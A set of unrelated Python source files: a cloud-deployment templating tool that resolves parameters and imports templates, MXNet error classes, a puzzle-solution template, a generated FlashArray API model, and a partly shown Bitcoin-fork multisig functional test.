_add_subcomponent_file(
prefix + component, branch, "terraform", terraform, files
)
_add_subcomponent_file(prefix + component, branch, "azure", azure, files)
_add_subcomponent_file(prefix + component, branch, "docker", docker, files)
_add_subcomponent_file(
prefix + component, branch, "connect", connect, files
)
_add_subcomponent_file(prefix + component, branch, "image", image, files)
if isinstance(image, six.string_types):
files.append(
prefix + component + os.sep + "image" + os.sep + "infra.properties"
)
files.append(
prefix
+ component
+ os.sep
+ "image"
+ os.sep
+ "infra-"
+ branch
+ ".properties"
)
initial_resolve = ret.copy()
os.environ["DO_NOT_RESOLVE_EXTERNAL_REFS"] = "true"
for file in files:
if os.path.exists(file):
import_parameter_file(file, initial_resolve)
del os.environ["DO_NOT_RESOLVE_EXTERNAL_REFS"]
if "REGION" not in initial_resolve:
ret["REGION"] = region()
else:
ret["REGION"] = initial_resolve["REGION"]
if not "AWS_DEFAULT_REGION" in os.environ:
os.environ["AWS_DEFAULT_REGION"] = ret["REGION"]
if "paramEnvId" not in initial_resolve:
ret["paramEnvId"] = branch
else:
ret["paramEnvId"] = initial_resolve["paramEnvId"]
for file in files:
if os.path.exists(file):
import_parameter_file(file, ret)
if (serverless or stack or cdk or terraform) and resolve_images:
image_branch = branch
if "BAKE_IMAGE_BRANCH" in ret:
image_branch = ret["BAKE_IMAGE_BRANCH"]
for docker in [
dockerdir.split("/docker-")[1]
for dockerdir in glob(component + os.sep + "docker-*")
]:
try:
ret["paramDockerUri" + docker] = resolve_docker_uri(
component, "paramDockerUri" + docker, image_branch, git
)
except ClientError:
# Best effor to load docker uris, but ignore errors since the repo might not
# actually be in use. Missing and used uris will result in an error later.
pass
for image_name in [
imagedir.split("/image")[1].replace("-", "").lower()
for imagedir in glob(component + os.sep + "image*")
]:
try:
image = resolve_ami(
ret, component, image_name, image_branch, branch, git
)
if image:
ret["paramAmi" + image_name] = image["ImageId"]
ret["paramAmiName" + image_name] = image["Name"]
env_param_name = "AMI_ID"
if image_name:
env_param_name += "_" + image_name.upper()
ret[env_param_name] = image["ImageId"]
except ClientError:
# Best effor to load ami info, but ignore errors since the image might not
# actually be in use. Missing and used images will result in an error later.
pass
if "REGION" not in ret:
ret["REGION"] = region()
if "paramEnvId" not in ret:
ret["paramEnvId"] = branch
if "ORIG_STACK_NAME" in os.environ:
ret["ORIG_STACK_NAME"] = os.environ["ORIG_STACK_NAME"]
if "STACK_NAME" not in ret:
ret["STACK_NAME"] = (
component + "-" + ret["ORIG_STACK_NAME"] + "-" + ret["paramEnvId"]
)
if docker and "NEEDS_DOCKER" not in ret:
ret["NEEDS_DOCKER"] = "y"
for k, v in list(os.environ.items()):
if k.startswith("ORIG_") and k.endswith("_NAME"):
ret[k] = v
if "ORIG_DOCKER_NAME" in os.environ:
if "DOCKER_NAME" not in ret:
ret["DOCKER_NAME"] = (
component + "/" + ret["paramEnvId"] + "-" + ret["ORIG_DOCKER_NAME"]
)
if "BUILD_JOB_PREFIX" not in ret:
if "JENKINS_JOB_PREFIX" in ret:
ret["BUILD_JOB_PREFIX"] = ret["JENKINS_JOB_PREFIX"]
else:
ret["BUILD_JOB_PREFIX"] = "ndt" + ret["paramEnvId"]
if "JENKINS_JOB_PREFIX" not in ret:
ret["JENKINS_JOB_PREFIX"] = ret["BUILD_JOB_PREFIX"]
if (
subc_type
and subc_type.upper() + "_NAME" not in ret
and "ORIG_" + subc_type.upper() + "_NAME" in ret
):
ret[subc_type.upper() + "_NAME"] = ret[
"ORIG_" + subc_type.upper() + "_NAME"
]
if subc_type == "azure":
if "AZURE_SCOPE" not in ret:
if "AZURE_SCOPE" in os.environ and os.environ["AZURE_SCOPE"]:
ret["AZURE_SCOPE"] = os.environ["AZURE_SCOPE"]
else:
ret["AZURE_SCOPE"] = "group"
if ret["AZURE_SCOPE"] == "group" and (
"AZURE_GROUP" not in ret or not ret["AZURE_GROUP"]
):
ret["AZURE_GROUP"] = (
ret["BUILD_JOB_PREFIX"] + "-" + component + "-" + azure
)
if ret["AZURE_SCOPE"] == "management-group" and (
"AZURE_MANAGEMENT_GROUP" not in ret or not ret["AZURE_MANAGEMENT_GROUP"]
):
ret["AZURE_MANAGEMENT_GROUP"] = (
ret["BUILD_JOB_PREFIX"] + "-" + component
)
parameters[params_key] = ret
return ret
def yaml_save(data):
class OrderedDumper(yaml.SafeDumper):
pass
def _dict_representer(dumper, data):
return dumper.represent_mapping(
yaml.resolver.BaseResolver.DEFAULT_MAPPING_TAG, list(data.items())
)
OrderedDumper.add_representer(OrderedDict, _dict_representer)
return yaml.dump(data, None, OrderedDumper, default_flow_style=False)
def json_load(stream):
return json.loads(stream, object_pairs_hook=OrderedDict)
def json_save(data):
return json.dumps(data, indent=2, default=dthandler)
def json_save_small(data):
return json.dumps(data, indent=None, default=dthandler)
############################################################################
# import_scripts
gotImportErrors = False
def resolve_file(filename, basefile):
if filename[0] == "/":
return existing(filename)
if re.match(r"^(\.\./\.\./|\.\./|\./)?aws-utils/.*", filename):
return existing(
find_include(re.sub(r"^(\.\./\.\./|\.\./|\./)?aws-utils/", "", filename))
)
if re.match(r"^\(\(\s?includes\s?\)\)/.*", filename):
return existing(find_include(re.sub(r"^\(\(\s?includes\s?\)\)/", "", filename)))
base = os.path.dirname(basefile)
if len(base) == 0:
base = "."
return existing(base + "/" + filename)
def existing(filename):
if filename and os.path.exists(filename):
return filename
else:
return None
PARAM_NOT_AVAILABLE = ParamNotAvailable()
def _add_params(target, source, source_prop, use_value):
if source_prop in source:
if isinstance(source[source_prop], OrderedDict) or isinstance(
source[source_prop], dict
):
for k, val in list(source[source_prop].items()):
target[k] = (
val["Default"]
if use_value and "Default" in val
else PARAM_NOT_AVAILABLE
)
elif isinstance(source[source_prop], list):
for list_item in source[source_prop]:
for k, val in list(list_item.items()):
target[k] = (
val["Default"]
if use_value and "Default" in val
else PARAM_NOT_AVAILABLE
)
def _get_params(data, template):
params = OrderedDict()
# first load defaults for all parameters in "Parameters"
if "Parameters" in data:
_add_params(params, data, "Parameters", True)
if (
"Fn::Merge" in data["Parameters"]
and "Result" in data["Parameters"]["Fn::Merge"]
):
_add_params(params, data["Parameters"]["Fn::Merge"], "Result", True)
if (
"Fn::ImportYaml" in data["Parameters"]
and "Result" in data["Parameters"]["Fn::ImportYaml"]
):
_add_params(params, data["Parameters"]["Fn::ImportYaml"], "Result", True)
if "resources" in data and "Parameters" in data["resources"]:
params["ServerlessDeploymentBucket"] = PARAM_NOT_AVAILABLE
_add_params(params, data["resources"], "Parameters", True)
if (
"Fn::Merge" in data["resources"]["Parameters"]
and "Result" in data["resources"]["Parameters"]["Fn::Merge"]
):
_add_params(
params, data["resources"]["Parameters"]["Fn::Merge"], "Result", True
)
if (
"Fn::ImportYaml" in data["resources"]["Parameters"]
and "Result" in data["resources"]["Parameters"]["Fn::ImportYaml"]
):
_add_params(
params,
data["resources"]["Parameters"]["Fn::ImportYaml"],
"Result",
True,
)
params["STACK_NAME"] = PARAM_NOT_AVAILABLE
if "REGION" not in os.environ:
os.environ["REGION"] = region()
params["REGION"] = os.environ["REGION"]
if "ACCOUNT_ID" not in os.environ:
if resolve_account():
os.environ["ACCOUNT_ID"] = resolve_account()
else:
os.environ["ACCOUNT_ID"] = "None"
params["ACCOUNT_ID"] = os.environ["ACCOUNT_ID"]
global SOURCED_PARAMS
if not SOURCED_PARAMS:
SOURCED_PARAMS = {}
# then override them with values from infra
template_dir = os.path.dirname(os.path.abspath(template))
image_dir = os.path.dirname(template_dir)
image_name = os.path.basename(image_dir)
stack_name = os.path.basename(template_dir)
stack_name = re.sub("^stack-", "", stack_name)
SOURCED_PARAMS = load_parameters(component=image_name, stack=stack_name)
SOURCED_PARAMS.update(os.environ)
params.update(SOURCED_PARAMS)
# source_infra_properties.sh always resolves a region, account id and stack
# name
params["AWS::Region"] = params["REGION"]
params["AWS::AccountId"] = params["ACCOUNT_ID"]
params["AWS::StackName"] = params["STACK_NAME"]
# finally load AWS-provided and "Resources"
params["AWS::NotificationARNs"] = PARAM_NOT_AVAILABLE
params["AWS::NoValue"] = PARAM_NOT_AVAILABLE
params["AWS::StackId"] = PARAM_NOT_AVAILABLE
_add_params(params, data, "Resources", False)
if "resources" in data:
_add_params(params, data["resources"], "Resources", False)
return params
# Applies recursively source to script inline expression
def apply_source(data, filename, optional, default):
if isinstance(data, OrderedDict):
if "Ref" in data:
data["__source"] = filename
if optional == "#optional":
data["__optional"] = "true"
data["__default"] = default
for k, val in list(data.items()):
apply_source(k, filename, optional, default)
apply_source(val, filename, optional, default)
# returns new data
def _preprocess_template(data, root, basefile, path, templateParams):
param_refresh_callback = lambda: templateParams.update(_get_params(root, basefile))
param_refresh_callback()
global gotImportErrors
if isinstance(data, OrderedDict):
if "Fn::ImportFile" in data:
val = data["Fn::ImportFile"]
file = expand_vars(val, templateParams, None, [])
script_import = resolve_file(file, basefile)
if script_import:
params = OrderedDict(list(templateParams.items()))
params.update(data)
data.clear()
contents = expand_only_double_paranthesis_params(
import_script(script_import), params, None, []
)
data["Fn::Join"] = ["", contents]
else:
print(
"ERROR: "
+ val
+ ": Can't import file \""
+ val
+ '" - file not found on include paths or relative to '
+ basefile
)
gotImportErrors = True
elif "Fn::ImportYaml" in data:
val = data["Fn::ImportYaml"]
jmespath = None
if "jmespath" in data and data["jmespath"]:
jmespath = data["jmespath"]
file = expand_vars(val, templateParams, None, [])
yaml_file = resolve_file(file, basefile)
del data["Fn::ImportYaml"]
if yaml_file:
contents = yaml_load(open(yaml_file))
params = OrderedDict(list(templateParams.items()))
params.update(data)
contents = expand_vars(contents, params, None, [])
data["Fn::ImportYaml"] = OrderedDict()
data["Fn::ImportYaml"]["Result"] = contents
param_refresh_callback()
while True:
expanded_result = expand_vars(contents, templateParams, None, [])
if expanded_result == contents:
break
else:
contents.clear()
contents.update(expanded_result)
param_refresh_callback()
data.clear()
if isinstance(contents, OrderedDict):
for k, val in list(contents.items()):
data[k] = _preprocess_template(
val, root, yaml_file, path + k + "_", templateParams
)
elif isinstance(contents, list):
data = contents
for i in range(0, len(data)):
data[i] = _preprocess_template(
data[i],
root,
yaml_file,
path + str(i) + "_",
templateParams,
)
else:
print(
"ERROR: "
+ path
+ ": Can't import yaml file \""
+ yaml_file
+ "\" that isn't an associative array or"
+ " a list in file "
+ basefile
)
gotImportErrors = True
if jmespath:
data = search(jmespath, data)
else:
if not ("optional" in data and data["optional"]):
print(
"ERROR: "
+ val
+ ": Can't import file \""
+ val
+ '" - file not found on include paths or relative to '
+ basefile
)
gotImportErrors = True
else:
for k in list(data):
del data[k]
if data and "optional" in data:
del data["optional"]
data = _preprocess_template(data, root, yaml_file, path, templateParams)
elif "Fn::Merge" in data:
merge_list = (
data["Fn::Merge"]["Source"]
if "Source" in data["Fn::Merge"]
else data["Fn::Merge"]
)
result = (
data["Fn::Merge"]["Result"]
if "Result" in data["Fn::Merge"]
else OrderedDict()
)
data["Fn::Merge"] = OrderedDict(
[("Source", merge_list), ("Result", result)]
)
if not isinstance(merge_list, list):
print(
"ERROR: "
+ path
+ ": Fn::Merge must associate to a list in file "
+ basefile
)
gotImportErrors = True
return data
merge = _preprocess_template(
expand_vars(merge_list.pop(0), templateParams, None, []),
root,
basefile,
path + "/",
templateParams,
)
if not result:
result = merge
data["Fn::Merge"] = OrderedDict(
[("Source", merge_list), ("Result", result)]
)
elif not isinstance(merge, type(result)):
print(
"ERROR: "
+ path
+ ": First Fn::Merge entries "
+ "were of type "
+ str(type(result))
+ ", but the following entry was not: \n"
+ json.dumps(merge, indent=2)
+ "\nIn file "
+ basefile
)
gotImportErrors = True
elif isinstance(merge, OrderedDict):
result.update(merge)
elif isinstance(merge, list):
result.extend(merge)
else:
print("ERROR: " + path + ": Unsupported " + str(type(merge)))
gotImportErrors = True
param_refresh_callback()
while True:
expanded_result = expand_vars(result, templateParams, None, [])
if expanded_result == result:
break
else:
result.clear()
result.update(expanded_result)
param_refresh_callback()
if not merge_list:
del data["Fn::Merge"]
return result
else:
return _preprocess_template(
data, root, basefile, path + "/", templateParams
)
elif "StackRef" in data:
stack_var = expand_vars(data["StackRef"], templateParams, None, [])
stack_var = _check_refs(
stack_var, basefile, path + "StackRef_", templateParams, True
)
data.clear()
stack_value = _resolve_stackref_from_dict(stack_var)
if not stack_value:
raise StackRefUnresolved(
"Did not find value for: "
+ stack_var["paramName"]
+ " in stack "
+ stack_var["region"]
+ "."
+ stack_var["stackName"]
)
param_refresh_callback()
return stack_value
elif "TFRef" in data:
tf_var = expand_vars(data["TFRef"], templateParams, None, [])
tf_var = _check_refs(
tf_var, basefile, path + "TFRef_", templateParams, True
)
data.clear()
tf_value = _resolve_tfref_from_dict(tf_var)
if not tf_value:
ref = (
stack_var["paramName"]
if "paramName" in stack_var
else stack_var["jmespath"]
)
raise TFRefUnresolved(
"Did not find value for: "
+ ref
+ " in terraform compnent "
+ stack_var["component"]
+ "."
+ stack_var["terraform"]
)
param_refresh_callback()
return tf_value
elif "Encrypt" in data and "value" in data["Encrypt"]:
to_encrypt = data["Encrypt"]["value"]
enc_conf = data["Encrypt"]
del enc_conf["value"]
vault = Vault(**enc_conf)
resolved_value = _preprocess_template(
to_encrypt, root, basefile, path + "Encrypt_", templateParams
)
if not isinstance(resolved_value, six.string_types):
raise EncryptException("Encrypted value needs to be a string")
return b64encode(vault.direct_encrypt(resolved_value))
elif "Ref" in data:
data["__source"] = basefile
elif "VaultRef" in data:
vault_key = expand_vars(data["VaultRef"], templateParams, None, [])
return _resolve_vault_parameter(vault_key)
elif "SsmRef" in data:
ssm_key = expand_vars(data["SsmRef"], templateParams, None, [])
return _resolve_ssm_parameter(ssm_key)
elif "ProductAmi" in data:
product_code = expand_vars(data["ProductAmi"], templateParams, None, [])
return _resolve_product_ami(product_code)
elif "OwnerNamedAmi" in data:
owner_named = expand_vars(data["OwnerNamedAmi"], templateParams, None, [])
if "owner" in owner_named and "name" in owner_named:
return _resolve_onwer_named_ami(
owner_named["owner"], owner_named["name"]
)
elif "FlowRef" in data:
flow_name = expand_vars(data["FlowRef"], templateParams, None, [])
if flow_name:
return _resolve_flowref(flow_name)
else:
if "Parameters" in data:
data["Parameters"] = _preprocess_template(
data["Parameters"],
root,
basefile,
path + "Parameters_",
templateParams,
)
param_refresh_callback()
for k, val in list(data.items()):
if k != "Parameters":
data[k] = expand_vars(
_preprocess_template(
val, root, basefile, path + _to_str(k) + "_", templateParams
),
templateParams,
None,
[],
)
elif isinstance(data, list):
for i in range(0, len(data)):
data[i] = _preprocess_template(
data[i], root, basefile, path + str(i) + "_", templateParams
)
return data
# returns new data
def _check_refs(data, templateFile, path, templateParams, resolveRefs):
global gotImportErrors
if isinstance(data, OrderedDict):
if "Ref" in data:
var_name = data["Ref"]
if "__source" in data:
filename = data["__source"]
del data["__source"]
else:
filename = "unknown"
if "__source_line" in data:
file_line = data["__source_line"]
del data["__source_line"]
else:
file_line = 0
# Ignore serverless framework default rest api resource that is secretly created by the framework
if var_name not in templateParams and var_name != "ApiGatewayRestApi":
if "__optional" in data:
data = data["__default"]
else:
print(
"ERROR: "
+ path
+ ': Referenced parameter "'
+ var_name
+ '" in file '
+ filename
+ ":"
+ str(file_line)
+ " not declared in template parameters in "
+ templateFile
)
gotImportErrors = True
else:
if resolveRefs:
data = templateParams[var_name]
if data == PARAM_NOT_AVAILABLE:
print(
"ERROR: "
+ path
+ ': Referenced parameter "'
+ var_name
+ '" in file '
+ filename
+ " is resolved later by AWS; cannot resolve its"
+ " value now"
)
gotImportErrors = True
if "__optional" in data:
del data["__optional"]
if "__default" in data:
del data["__default"]
else:
for k, val in list(data.items()):
data[k] = _check_refs(
val, templateFile, path + k + "_", templateParams, resolveRefs
)
elif isinstance(data, list):
for i in range(0, len(data)):
data[i] = _check_refs(
data[i], templateFile, path + str(i) + "_", templateParams, resolveRefs
)
return data
def import_scripts(data, basefile, extra_parameters={}):
global gotImportErrors
gotImportErrors = False
params = _get_params(data, basefile)
params.update(extra_parameters)
data = expand_vars(data, params, None, [])
params = _get_params(data, basefile)
params.update(extra_parameters)
data = _preprocess_template(data, data, basefile, "", params)
params = _get_params(data, basefile)
params.update(extra_parameters)
data = _check_refs(data, basefile, "", params, False)
if gotImportErrors:
sys.exit(1)
return data
############################################################################
# extract_scripts
def bash_encode_parameter_name(name):
return "CF_" + re.sub("::", "__", name)
def encode_script_filename(prefix, path):
if path.find("UserData_Fn::Base64") != -1:
return prefix + "-userdata.sh"
idx = path.find(CFG_PREFIX)
if idx != -1:
soff = idx + len(CFG_PREFIX)
eoff = path.find("_content_", soff)
cfg_path = path[soff:eoff]
return prefix + "-" + cfg_path[cfg_path.rfind("/") + 1 :]
return prefix + "-" + path
def extract_script(prefix, path, join_args):
# print prefix, path
# "before" and "after" code blocks, placed before and after var declarations
code = ["", ""]
var_decls = OrderedDict()
code_idx = 0
for element in join_args:
if isinstance(element, OrderedDict):
if "Ref" not in element:
print("Dict with no ref")
json_save(element)
else:
var_name = element["Ref"]
if not len(var_name) > 0:
raise Exception(
"Failed to convert reference inside "
+ "script: "
+ str(element)
)
bash_varname = bash_encode_parameter_name(var_name)
var_decl = ""
# var_decl += "#" + var_name + "\n"
var_decl += bash_varname + '="";\n'
var_decls[var_name] = var_decl
code[code_idx] += "${" + bash_varname + "}"
else:
code[code_idx] += element
code_idx = 1 # switch to "after" block
filename = encode_script_filename(prefix, path)
sys.stderr.write(
prefix + ": Exported path '" + path + "' contents to file '" + filename + "'\n"
)
with open(filename, "w") as script_file: # opens file with name of "test.txt"
script_file.write(code[0])
script_file.write("\n")
for var_name, var_decl in list(var_decls.items()):
script_file.write(var_decl)
script_file.write("\n")
script_file.write(code[1])
return filename
# data argument is mutated
def extract_scripts(data, prefix, path=""):
if not isinstance(data, OrderedDict):
return
for k, val in list(data.items()):
extract_scripts(val, prefix, path + k + "_")
if k == "Fn::Join":
if not val[0] == "":
continue
if isinstance(val[1][0], six.string_types) and (val[1][0].find("#!") != 0):
continue
script_file = extract_script(prefix, path, val[1])
del data[k]
data["Fn::ImportFile"] = script_file
############################################################################
# simple apis
def yaml_to_dict(yaml_file_to_convert, merge=[], extra_parameters={}):
data = OrderedDict()
with open(yaml_file_to_convert) as yaml_file:
data = yaml_load(yaml_file)
if "connectInstanceId" in data:
global CONNECT_INSTANCE_ID
CONNECT_INSTANCE_ID = expand_vars(data["connectInstanceId"], {}, None, [])
if merge:
for i in range(0, len(merge)):
with open(merge[i]) as yaml_file:
merge[i] = yaml_load(yaml_file)
merge.append(data)
merge_data = OrderedDict()
merge_data["Fn::Merge"] = merge
data = merge_data
data = import_scripts(data, yaml_file_to_convert, extra_parameters=extra_parameters)
_patch_launchconf(data)
return data
def yaml_to_json(yaml_file_to_convert, merge=[]):
data = yaml_to_dict(yaml_file_to_convert, merge)
return json_save(data)
def yaml_to_yaml(yaml_file_to_convert):
data = yaml_to_dict(yaml_file_to_convert)
return yaml_save(data)
def json_to_yaml(json_file_to_convert):
data = json_load(open(json_file_to_convert).read())
extract_scripts(data, json_file_to_convert)
return yaml_save(data)
############################################################################
# misc json
def locate_launchconf_metadata(data):
if "Resources" in data:
resources = data["Resources"]
for val in list(resources.values()):
if (
val
and "Type" in val
and val["Type"] == "AWS::AutoScaling::LaunchConfiguration"
and "Metadata" in val
):
return val["Metadata"]
return None
def locate_launchconf_userdata(data):
resources = data["Resources"]
for val in list(resources.values()):
if "Type" in val and val["Type"] == "AWS::AutoScaling::LaunchConfiguration":
if (
"Properties" in val
and "UserData" in val["Properties"]
and "Fn::Base64" in val["Properties"]["UserData"]
and "Fn::Join" in val["Properties"]["UserData"]["Fn::Base64"]
and len(val["Properties"]["UserData"]["Fn::Base64"]["Fn::Join"]) >= 2
):
return val["Properties"]["UserData"]["Fn::Base64"]["Fn::Join"][1]
else:
if (
"Properties" in val
and "UserData" in val["Properties"]
and "Fn::Base64" in val["Properties"]["UserData"]
and "Fn::Sub" in val["Properties"]["UserData"]["Fn::Base64"]
):
return val["Properties"]["UserData"]["Fn::Base64"]["Fn::Sub"]
return None
def reset_launchconf_userdata(data, lc_userdata):
resources = data["Resources"]
for val in list(resources.values()):
if "Type" in val and val["Type"] == "AWS::AutoScaling::LaunchConfiguration":
val["Properties"]["UserData"]["Fn::Base64"]["Fn::Sub"] = lc_userdata
def get_refs(data, reflist=None):
if not reflist:
reflist = []
if isinstance(data, OrderedDict):
if "Ref" in data:
reflist.append(data["Ref"])
for val in list(data.values()):
get_refs(val, reflist)
elif isinstance(data, list):
for ref in data:
get_refs(ref, reflist)
return reflist
def _patch_launchconf(data):
lc_meta = locate_launchconf_metadata(data)
if lc_meta is not None:
lc_userdata = locate_launchconf_userdata(data)
if lc_userdata:
if isinstance(lc_userdata, list):
lc_userdata.append(
"\nexit 0\n# metadata hash: " + str(hash(json_save(lc_meta))) + "\n"
)
else:
lc_userdata += (
"\nexit 0\n# metadata hash: " + str(hash(json_save(lc_meta))) + "\n"
)
reset_launchconf_userdata(data, lc_userdata)
lc_meta_refs = set(get_refs(lc_meta))
if len(lc_meta_refs) > 0:
first = 1
for ref in lc_meta_refs:
lc_userdata.append("# metadata params: " if first else ", ")
lc_userdata.append({"Ref": ref})
first = 0
lc_userdata.append("\n")
class StackRefUnresolved(Exception):
pass
class TFRefUnresolved(Exception):
pass
class EncryptException(Exception):
pass
|
py | b4110809c95aed5e3984418a07619846dab610e0 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Structured error classes in MXNet.
Each error class takes an error message as its input.
See the example sections for for suggested message conventions.
To make the code more readable, we recommended developers to
copy the examples and raise errors with the same message convention.
"""
from .base import MXNetError, register_error
__all__ = ['MXNetError', 'register']
register = register_error
@register_error
class InternalError(MXNetError):
"""Internal error in the system.
Examples
--------
.. code :: c++
// Example code C++
LOG(FATAL) << "InternalError: internal error detail.";
.. code :: python
# Example code in python
raise InternalError("internal error detail")
"""
def __init__(self, msg):
# Patch up additional hint message.
if "MXNet hint:" not in msg:
msg += ("\nMXNet hint: You hit an internal error. Please open an issue in "
"https://github.com/apache/incubator-mxnet/issues/new/choose"
" to report it.")
super(InternalError, self).__init__(msg)
register_error("ValueError", ValueError)
register_error("TypeError", TypeError)
register_error("AttributeError", AttributeError)
register_error("IndexError", IndexError)
register_error("NotImplementedError", NotImplementedError)
|
py | b41108941268bb94b46cfe540ae9ba2ff729ed01 | RUN_TEST = True
TEST_SOLUTION = ...
TEST_INPUT_FILE = 'test_input_day_XX.txt'
INPUT_FILE = 'input_day_XX.txt'
ARGS = []
def main_part1(input_file, ):
with open(input_file) as file:
lines = list(map(lambda line: line.rstrip(), file.readlines()))
...
solution = ...
return solution
if __name__ == '__main__':
if RUN_TEST:
solution = main_part1(TEST_INPUT_FILE, *ARGS)
print(solution)
assert (TEST_SOLUTION == solution)
else:
solution = main_part1(INPUT_FILE, *ARGS)
print(solution)
|
py | b41109389b0475386ac77cc4261043485424e85f | # coding: utf-8
"""
FlashArray REST API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: 2.2
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re
import six
import typing
from ....properties import Property
if typing.TYPE_CHECKING:
from pypureclient.flasharray.FA_2_2 import models
class ReplicaLinkPerformanceReplication(object):
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'bytes_per_sec_from_remote': 'int',
'bytes_per_sec_to_remote': 'int',
'bytes_per_sec_total': 'int',
'direction': 'str',
'local_pod': 'FixedReference',
'remote_pod': 'FixedReference',
'remotes': 'list[FixedReference]',
'time': 'int'
}
attribute_map = {
'bytes_per_sec_from_remote': 'bytes_per_sec_from_remote',
'bytes_per_sec_to_remote': 'bytes_per_sec_to_remote',
'bytes_per_sec_total': 'bytes_per_sec_total',
'direction': 'direction',
'local_pod': 'local_pod',
'remote_pod': 'remote_pod',
'remotes': 'remotes',
'time': 'time'
}
required_args = {
}
def __init__(
self,
bytes_per_sec_from_remote=None, # type: int
bytes_per_sec_to_remote=None, # type: int
bytes_per_sec_total=None, # type: int
direction=None, # type: str
local_pod=None, # type: models.FixedReference
remote_pod=None, # type: models.FixedReference
remotes=None, # type: List[models.FixedReference]
time=None, # type: int
):
"""
Keyword args:
bytes_per_sec_from_remote (int): The number of bytes received per second from a remote array.
bytes_per_sec_to_remote (int): The number of bytes transmitted per second to a remote array.
bytes_per_sec_total (int): Total bytes transmitted and received per second.
direction (str): The direction of replication. Valid values are `inbound` and `outbound`.
local_pod (FixedReference): Reference to a local pod.
remote_pod (FixedReference): Reference to a remote pod.
remotes (list[FixedReference]): Reference to a remote array.
time (int): Sample time in milliseconds since the UNIX epoch.
"""
if bytes_per_sec_from_remote is not None:
self.bytes_per_sec_from_remote = bytes_per_sec_from_remote
if bytes_per_sec_to_remote is not None:
self.bytes_per_sec_to_remote = bytes_per_sec_to_remote
if bytes_per_sec_total is not None:
self.bytes_per_sec_total = bytes_per_sec_total
if direction is not None:
self.direction = direction
if local_pod is not None:
self.local_pod = local_pod
if remote_pod is not None:
self.remote_pod = remote_pod
if remotes is not None:
self.remotes = remotes
if time is not None:
self.time = time
def __setattr__(self, key, value):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `ReplicaLinkPerformanceReplication`".format(key))
if key == "bytes_per_sec_from_remote" and value is not None:
if value < 0:
raise ValueError("Invalid value for `bytes_per_sec_from_remote`, must be a value greater than or equal to `0`")
if key == "bytes_per_sec_to_remote" and value is not None:
if value < 0:
raise ValueError("Invalid value for `bytes_per_sec_to_remote`, must be a value greater than or equal to `0`")
if key == "bytes_per_sec_total" and value is not None:
if value < 0:
raise ValueError("Invalid value for `bytes_per_sec_total`, must be a value greater than or equal to `0`")
self.__dict__[key] = value
def __getattribute__(self, item):
value = object.__getattribute__(self, item)
if isinstance(value, Property):
raise AttributeError
else:
return value
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
if hasattr(self, attr):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(ReplicaLinkPerformanceReplication, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ReplicaLinkPerformanceReplication):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
py | b4110975bb7a800872a0c9cd438c40315c6e521b | #!/usr/bin/env python3
# Copyright (c) 2015-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Test new Cureoptedcoin multisig prefix functionality.
#
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import (
assert_equal,
connect_nodes,
)
class ScriptAddress2Test(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 3
self.setup_clean_chain = True
self.extra_args = [['-addresstype=legacy', '-deprecatedrpc=accounts', '-txindex=1'], [], ['-txindex=1']]
def setup_network(self, split=False):
self.setup_nodes()
connect_nodes(self.nodes[1], 0)
connect_nodes(self.nodes[2], 0)
self.sync_all()
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
cnt = self.nodes[0].getblockcount()
# Mine some blocks
self.nodes[1].generate(101)
self.sync_all()
if (self.nodes[0].getblockcount() != cnt + 101):
raise AssertionError("Failed to mine 100 blocks")
addr = self.nodes[0].getnewaddress()
addr2 = self.nodes[0].getnewaddress()
multisig_addr = self.nodes[0].addmultisigaddress(2, [addr, addr2], "multisigaccount")['address']
assert_equal(multisig_addr[0], 'Q')
# Send to a new multisig address
txid = self.nodes[1].sendtoaddress(multisig_addr, 1)
self.nodes[1].generate(101)
self.sync_all()
tx = self.nodes[0].getrawtransaction(txid, 1)
dest_addrs = [tx["vout"][0]['scriptPubKey']['addresses'][0],
tx["vout"][1]['scriptPubKey']['addresses'][0]]
assert(multisig_addr in dest_addrs)
# Spend from the new multisig address
addr3 = self.nodes[1].getnewaddress()
txid = self.nodes[0].sendtoaddress(addr3, 0.8)
self.nodes[0].generate(2)
self.sync_all()
assert(self.nodes[0].getbalance("*", 1) < 0.2)
assert(self.nodes[1].listtransactions()[-1]['address'] == addr3)
# Send to an old multisig address. The api addmultisigaddress
# can only generate a new address so we manually compute
# multisig_addr_old beforehand using an old client.
priv_keys = ["cU7eeLPKzXeKMeZvnEJhvZZ3tLqVF3XGeo1BbM8dnbmV7pP3Qg89",
"cTw7mRhSvTfzqCt6MFgBoTBqwBpYu2rWugisXcwjv4cAASh3iqPt"]
addrs = ["mj6gNGRXPXrD69R5ApjcsDerZGrYKSfb6v",
"mqET4JA3L7P7FoUjUP3F6m6YsLpCkyzzou"]
self.nodes[0].importprivkey(priv_keys[0])
